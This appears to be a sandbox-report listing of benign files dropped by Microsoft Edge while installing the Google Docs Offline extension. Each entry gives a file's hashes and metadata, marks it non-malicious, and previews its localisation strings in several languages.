                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "OPRET NYT".. },.. "explanationofflinedisabled": {.. "message": "Du er offline. Hvis du vil bruge Google Docs uden en internetforbindelse, kan du g. til indstillinger p. startsiden for Google Docs og aktivere offlinesynkronisering, n.ste gang du har internetforbindelse.".. },.. "explanationofflineenabled": {.. "message": "Du er offline, men du kan stadig redigere tilg.ngelige filer eller oprette nye.".. },.. "extdesc": {.. "message": "Rediger, opret og se dine dokumenter, regneark og pr.sentationer helt uden internetadgang.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "F. flere oplysninger".. },.. "popuphelptext": {.. "message": "Skriv, rediger og samarbejd, uanset hvor du er, og uanset om du har internetforbindelse.".. }..}..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir920_2096276513\CRX_INSTALL\_locales\de\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1031
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.621865814402898
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HA6sZnqWd77ykJzCkhRhoe1HMNaAJPwG/p98HKpy2kX/R:WZqWxykJzthRhoQma+tpyHX2O/R
                                                                                                                                                                                                                                                                                                MD5:D116453277CC860D196887CEC6432FFE
                                                                                                                                                                                                                                                                                                SHA1:0AE00288FDE696795CC62FD36EABC507AB6F4EA4
                                                                                                                                                                                                                                                                                                SHA-256:36AC525FA6E28F18572D71D75293970E0E1EAD68F358C20DA4FDC643EEA2C1C5
                                                                                                                                                                                                                                                                                                SHA-512:C788C3202A27EC220E3232AE25E3C855F3FDB8F124848F46A3D89510C564641A2DFEA86D5014CEA20D3D2D3C1405C96DBEB7CCAD910D65C55A32FDCA8A33FDD4
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "NEU ERSTELLEN".. },.. "explanationofflinedisabled": {.. "message": "Sie sind offline. Um Google Docs ohne Internetverbindung zu verwenden, gehen Sie auf der Google Docs-Startseite auf \"Einstellungen\" und schalten die Offlinesynchronisierung ein, wenn Sie das n.chste Mal mit dem Internet verbunden sind.".. },.. "explanationofflineenabled": {.. "message": "Sie sind offline, aber k.nnen weiterhin verf.gbare Dateien bearbeiten oder neue Dateien erstellen.".. },.. "extdesc": {.. "message": "Mit der Erweiterung k.nnen Sie Dokumente, Tabellen und Pr.sentationen bearbeiten, erstellen und aufrufen.. ganz ohne Internetverbindung.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Weitere Informationen".. },.. "popuphelptext": {.. "message": "Mit oder ohne Internetverbindung: Sie k.nnen von .berall Dokumente erstellen, .ndern und zusammen mit anderen

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir920_2096276513\CRX_INSTALL\_locales\el\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1613
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.618182455684241
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAJKan4EITDZGoziRAc2Z8eEfkTJfLhGX7b0UBNoAcGpVyhxefSmuq:SKzTD0IK85JlwsGOUyaSk
                                                                                                                                                                                                                                                                                                MD5:9ABA4337C670C6349BA38FDDC27C2106
                                                                                                                                                                                                                                                                                                SHA1:1FC33BE9AB4AD99216629BC89FBB30E7AA42B812
                                                                                                                                                                                                                                                                                                SHA-256:37CA6AB271D6E7C9B00B846FDB969811C9CE7864A85B5714027050795EA24F00
                                                                                                                                                                                                                                                                                                SHA-512:8564F93AD8485C06034A89421CE74A4E719BBAC865E33A7ED0B87BAA80B7F7E54B240266F2EDB595DF4E6816144428DB8BE18A4252CBDCC1E37B9ECC9F9D7897
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": ".......... ....".. },.. "explanationofflinedisabled": {.. "message": "..... ..... ......... ... .. ............... .. ....... Google ..... ....... ... ........., ......... .... ......... .... ...... ...... ... ........ Google ... ............. ... ........... ..... ........ ... ....... .... ... .. ..... ............ ... ..........".. },.. "explanationofflineenabled": {.. "message": "..... ..... ........ .... ........ .. .............. .. ......... ...... . .. ............. ... .......".. },.. "extdesc": {.. "message": ".............., ............ ... ..... .. ......., .

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir920_2096276513\CRX_INSTALL\_locales\en\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):851
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                                MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                                SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                                SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                                SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir920_2096276513\CRX_INSTALL\_locales\en_CA\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):851
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                                MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                                SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                                SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                                SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir920_2096276513\CRX_INSTALL\_locales\en_GB\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):848
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.494568170878587
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:1HASvgg4eCBxNdN3vRyc1NzXW6iFrSCBxesJGceKCSUuvlvOgwCBhUufz1tnaXrQ:1HA3djfR3NzXviFrJj4sJXJ+bA6RM
                                                                                                                                                                                                                                                                                                MD5:3734D498FB377CF5E4E2508B8131C0FA
                                                                                                                                                                                                                                                                                                SHA1:AA23E39BFE526B5E3379DE04E00EACBA89C55ADE
                                                                                                                                                                                                                                                                                                SHA-256:AB5CDA04013DCE0195E80AF714FBF3A67675283768FFD062CF3CF16EDB49F5D4
                                                                                                                                                                                                                                                                                                SHA-512:56D9C792954214B0DE56558983F7EB7805AC330AF00E944E734340BE41C68E5DD03EDDB17A63BC2AB99BDD9BE1F2E2DA5BE8BA7C43D938A67151082A9041C7BA
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an Internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the Internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create and view your documents, spreadsheets and presentations . all without Internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn more".. },.. "popuphelptext": {.. "message": "Write, edit and collaborate wherever you are, with or without an Internet connection.".. }..}..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir920_2096276513\CRX_INSTALL\_locales\en_US\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1425
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.461560329690825
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HA6Krbbds5Kna/BNzXviFrpsCxKU4irpNQ0+qWK5yOJAaCB7MAa6:BKrbBs5Kna/BNzXvi3sCxKZirA0jWK5m
                                                                                                                                                                                                                                                                                                MD5:578215FBB8C12CB7E6CD73FBD16EC994
                                                                                                                                                                                                                                                                                                SHA1:9471D71FA6D82CE1863B74E24237AD4FD9477187
                                                                                                                                                                                                                                                                                                SHA-256:102B586B197EA7D6EDFEB874B97F95B05D229EA6A92780EA8544C4FF1E6BC5B1
                                                                                                                                                                                                                                                                                                SHA-512:E698B1A6A6ED6963182F7D25AC12C6DE06C45D14499DDC91E81BDB35474E7EC9071CFEBD869B7D129CB2CD127BC1442C75E408E21EB8E5E6906A607A3982B212
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createNew": {.. "description": "Text shown in the extension pop up for creating a new document",.. "message": "CREATE NEW".. },.. "explanationOfflineDisabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is disabled.",.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationOfflineEnabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is enabled.",.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extDesc": {.. "description": "Extension description",.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extName": {.. "description": "Extension name",..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir920_2096276513\CRX_INSTALL\_locales\es\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):961
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.537633413451255
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:1HASvggeCBxNFxcw2CVcfamedatqWCCBxeFxCF/m+rWAaFQbCSUuExqIQdO06stp:1HAqn0gcfa9dc/5mCpmIWck02USfWmk
                                                                                                                                                                                                                                                                                                MD5:F61916A206AC0E971CDCB63B29E580E3
                                                                                                                                                                                                                                                                                                SHA1:994B8C985DC1E161655D6E553146FB84D0030619
                                                                                                                                                                                                                                                                                                SHA-256:2008F4FAAB71AB8C76A5D8811AD40102C380B6B929CE0BCE9C378A7CADFC05EB
                                                                                                                                                                                                                                                                                                SHA-512:D9C63B2F99015355ACA04D74A27FD6B81170750C4B4BE7293390DC81EF4CD920EE9184B05C61DC8979B6C2783528949A4AE7180DBF460A2620DBB0D3FD7A05CF
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CREAR".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a Configuraci.n en la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que te conectes a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n. Aun as., puedes crear archivos o editar los que est.n disponibles.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones; todo ello, sin acceso a Internet.".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe o edita contenido y colabora con otras personas desde cualquier lugar, con o sin conexi.n a Internet.".. }..}..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir920_2096276513\CRX_INSTALL\_locales\es_419\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):959
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.570019855018913
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HARn05cfa9dcDmQOTtSprj0zaGUSjSGZ:+n0CfMcDmQOTQprj4qpC
                                                                                                                                                                                                                                                                                                MD5:535331F8FB98894877811B14994FEA9D
                                                                                                                                                                                                                                                                                                SHA1:42475E6AFB6A8AE41E2FC2B9949189EF9BBE09FB
                                                                                                                                                                                                                                                                                                SHA-256:90A560FF82605DB7EDA26C90331650FF9E42C0B596CEDB79B23598DEC1B4988F
                                                                                                                                                                                                                                                                                                SHA-512:2CE9C69E901AB5F766E6CFC1E592E1AF5A07AA78D154CCBB7898519A12E6B42A21C5052A86783ABE3E7A05043D4BD41B28960FEDDB30169FF7F7FE7208C8CFE9
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CREAR NUEVO".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a la configuraci.n de la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que est.s conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n, pero a.n puedes modificar los archivos disponibles o crear otros nuevos.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones aunque no tengas acceso a Internet".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, modifica y colabora dondequiera que est.s, con conexi.n a Internet o sin ella.".. }..}..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir920_2096276513\CRX_INSTALL\_locales\et\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):968
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.633956349931516
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HA5WG6t306+9sihHvMfdJLjUk4NJPNczGr:mWGY0cOUdJODPmzs
                                                                                                                                                                                                                                                                                                MD5:64204786E7A7C1ED9C241F1C59B81007
                                                                                                                                                                                                                                                                                                SHA1:586528E87CD670249A44FB9C54B1796E40CDB794
                                                                                                                                                                                                                                                                                                SHA-256:CC31B877238DA6C1D51D9A6155FDE565727A1956572F466C387B7E41C4923A29
                                                                                                                                                                                                                                                                                                SHA-512:44FCF93F3FB10A3DB68D74F9453995995AB2D16863EC89779DB451A4D90F19743B8F51095EEC3ECEF5BD0C5C60D1BF3DFB0D64DF288DCCFBE70C129AE350B2C6
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "LOO UUS".. },.. "explanationofflinedisabled": {.. "message": "Teil ei ole v.rgu.hendust. Teenuse Google.i dokumendid kasutamiseks ilma Interneti-.henduseta avage j.rgmine kord, kui olete Internetiga .hendatud, teenuse Google.i dokumendid avalehel seaded ja l.litage sisse v.rgu.henduseta s.nkroonimine.".. },.. "explanationofflineenabled": {.. "message": "Teil ei ole v.rgu.hendust, kuid saate endiselt saadaolevaid faile muuta v.i uusi luua.".. },.. "extdesc": {.. "message": "Saate luua, muuta ja vaadata oma dokumente, arvustustabeleid ning esitlusi ilma Interneti-.henduseta.".. },.. "extname": {.. "message": "V.rgu.henduseta Google.i dokumendid".. },.. "learnmore": {.. "message": "Lisateave".. },.. "popuphelptext": {.. "message": "Kirjutage, muutke ja tehke koost..d .ksk.ik kus olenemata sellest, kas teil on Interneti-.hendus.".. }..}..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir920_2096276513\CRX_INSTALL\_locales\eu\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):838
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.4975520913636595
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:YnmjggqTWngosqYQqE1kjO39m7OddC0vjWQMmWgqwgQ8KLcxOb:Ynmsgqyngosq9qxTOs0vjWQMbgqchb
                                                                                                                                                                                                                                                                                                MD5:29A1DA4ACB4C9D04F080BB101E204E93
                                                                                                                                                                                                                                                                                                SHA1:2D0E4587DDD4BAC1C90E79A88AF3BD2C140B53B1
                                                                                                                                                                                                                                                                                                SHA-256:A41670D52423BA69C7A65E7E153E7B9994E8DD0370C584BDA0714BD61C49C578
                                                                                                                                                                                                                                                                                                SHA-512:B7B7A5A0AA8F6724B0FA15D65F25286D9C66873F03080CBABA037BDEEA6AADC678AC4F083BC52C2DB01BEB1B41A755ED67BBDDB9C0FE4E35A004537A3F7FC458
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"SORTU"},"explanationofflinedisabled":{"message":"Ez zaude konektatuta Internetera. Google Dokumentuak konexiorik gabe erabiltzeko, joan Google Dokumentuak zerbitzuaren orri nagusiko ezarpenetara eta aktibatu konexiorik gabeko sinkronizazioa Internetera konektatzen zaren hurrengoan."},"explanationofflineenabled":{"message":"Ez zaude konektatuta Internetera, baina erabilgarri dauden fitxategiak edita ditzakezu, baita beste batzuk sortu ere."},"extdesc":{"message":"Editatu, sortu eta ikusi dokumentuak, kalkulu-orriak eta aurkezpenak Interneteko konexiorik gabe."},"extname":{"message":"Google Dokumentuak konexiorik gabe"},"learnmore":{"message":"Lortu informazio gehiago"},"popuphelptext":{"message":"Edonon zaudela ere, ez duzu zertan konektatuta egon idatzi, editatu eta lankidetzan jardun ahal izateko."}}.

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir920_2096276513\CRX_INSTALL\_locales\fa\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1305
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.673517697192589
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAX9yM7oiI99Rwx4xyQakJbfAEJhmq/RlBu92P7FbNcgYVJ0:JM7ovex4xyQaKjAEyq/p7taX0
                                                                                                                                                                                                                                                                                                MD5:097F3BA8DE41A0AAF436C783DCFE7EF3
                                                                                                                                                                                                                                                                                                SHA1:986B8CABD794E08C7AD41F0F35C93E4824AC84DF
                                                                                                                                                                                                                                                                                                SHA-256:7C4C09D19AC4DA30CC0F7F521825F44C4DFBC19482A127FBFB2B74B3468F48F1
                                                                                                                                                                                                                                                                                                SHA-512:8114EA7422E3B20AE3F08A3A64A6FFE1517A7579A3243919B8F789EB52C68D6F5A591F7B4D16CEE4BD337FF4DAF4057D81695732E5F7D9E761D04F859359FADB
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "..... ... ....".. },.. "explanationofflinedisabled": {.. "message": "...... ...... .... ....... .. ....... Google .... ..... ........ .... ... .. .. ....... ... ..... .. ....... .. .... .... ....... Google ..... . .......... ...... .. .... .....".. },.. "explanationofflineenabled": {.. "message": "...... ..... ... ...... ......... ......... .. .. .. ..... ..... ...... .... .. ........ ..... ..... .....".. },.. "extdesc": {.. "message": "...... ............ . ........ .. ....... ..... . ...... .... . ... ... ..... .... ...... .. ........".. },.. "extname": {.. "message": "....... Google .

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir920_2096276513\CRX_INSTALL\_locales\fi\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):911
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.6294343834070935
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:1HASvguCBxNMME2BESA7gPQk36xCBxeMMcXYBt+CSU1pfazCBhUunV1tLaX5GI2N:1HAVioESAsPf36O3Xst/p3J8JeEY
                                                                                                                                                                                                                                                                                                MD5:B38CBD6C2C5BFAA6EE252D573A0B12A1
                                                                                                                                                                                                                                                                                                SHA1:2E490D5A4942D2455C3E751F96BD9960F93C4B60
                                                                                                                                                                                                                                                                                                SHA-256:2D752A5DBE80E34EA9A18C958B4C754F3BC10D63279484E4DF5880B8FD1894D2
                                                                                                                                                                                                                                                                                                SHA-512:6E65207F4D8212736059CC802C6A7104E71A9CC0935E07BD13D17EC46EA26D10BC87AD923CD84D78781E4F93231A11CB9ED8D3558877B6B0D52C07CB005F1C0C
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "LUO UUSI".. },.. "explanationofflinedisabled": {.. "message": "Olet offline-tilassa. Jos haluat k.ytt.. Google Docsia ilman internetyhteytt., siirry Google Docsin etusivulle ja ota asetuksissa k.ytt..n offline-synkronointi, kun seuraavan kerran olet yhteydess. internetiin.".. },.. "explanationofflineenabled": {.. "message": "Olet offline-tilassa. Voit kuitenkin muokata k.ytett.viss. olevia tiedostoja tai luoda uusia.".. },.. "extdesc": {.. "message": "Muokkaa, luo ja katso dokumentteja, laskentataulukoita ja esityksi. ilman internetyhteytt..".. },.. "extname": {.. "message": "Google Docsin offline-tila".. },.. "learnmore": {.. "message": "Lis.tietoja".. },.. "popuphelptext": {.. "message": "Kirjoita, muokkaa ja tee yhteisty.t. paikasta riippumatta, my.s ilman internetyhteytt..".. }..}..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir920_2096276513\CRX_INSTALL\_locales\fil\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):939
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.451724169062555
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAXbH2eZXn6sjLITdRSJpGL/gWFJ3sqixO:ubHfZqsHIT/FLL3qO
                                                                                                                                                                                                                                                                                                MD5:FCEA43D62605860FFF41BE26BAD80169
                                                                                                                                                                                                                                                                                                SHA1:F25C2CE893D65666CC46EA267E3D1AA080A25F5B
                                                                                                                                                                                                                                                                                                SHA-256:F51EEB7AAF5F2103C1043D520E5A4DE0FA75E4DC375E23A2C2C4AFD4D9293A72
                                                                                                                                                                                                                                                                                                SHA-512:F66F113A26E5BCF54B9AAFA69DAE3C02C9C59BD5B9A05F829C92AF208C06DC8CCC7A1875CBB7B7CE425899E4BA27BFE8CE2CDAF43A00A1B9F95149E855989EE0
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "GUMAWA NG BAGO".. },.. "explanationofflinedisabled": {.. "message": "Naka-offline ka. Upang magamit ang Google Docs nang walang koneksyon sa internet, pumunta sa mga setting sa homepage ng Google Docs at i-on ang offline na pag-sync sa susunod na nakakonekta ka sa internet.".. },.. "explanationofflineenabled": {.. "message": "Naka-offline ka, ngunit maaari mo pa ring i-edit ang mga available na file o gumawa ng mga bago.".. },.. "extdesc": {.. "message": "I-edit, gawin, at tingnan ang iyong mga dokumento, spreadsheet, at presentation . lahat ng ito nang walang access sa internet.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Matuto Pa".. },.. "popuphelptext": {.. "message": "Magsulat, mag-edit at makipag-collaborate nasaan ka man, nang mayroon o walang koneksyon sa internet.".. }..}..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir920_2096276513\CRX_INSTALL\_locales\fr\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):977
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.622066056638277
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAdy42ArMdsH50Jd6Z1PCBolXAJ+GgNHp0X16M1J1:EyfArMS2Jd6Z1PCBolX2+vNmX16Y1
                                                                                                                                                                                                                                                                                                MD5:A58C0EEBD5DC6BB5D91DAF923BD3A2AA
                                                                                                                                                                                                                                                                                                SHA1:F169870EEED333363950D0BCD5A46D712231E2AE
                                                                                                                                                                                                                                                                                                SHA-256:0518287950A8B010FFC8D52554EB82E5D93B6C3571823B7CECA898906C11ABCC
                                                                                                                                                                                                                                                                                                SHA-512:B04AFD61DE490BC838354E8DC6C22BE5C7AC6E55386FFF78489031ACBE2DBF1EAA2652366F7A1E62CE87CFCCB75576DA3B2645FEA1645B0ECEB38B1FA3A409E8
                                                                                                                                                                                                                                                                                                Malicious:false
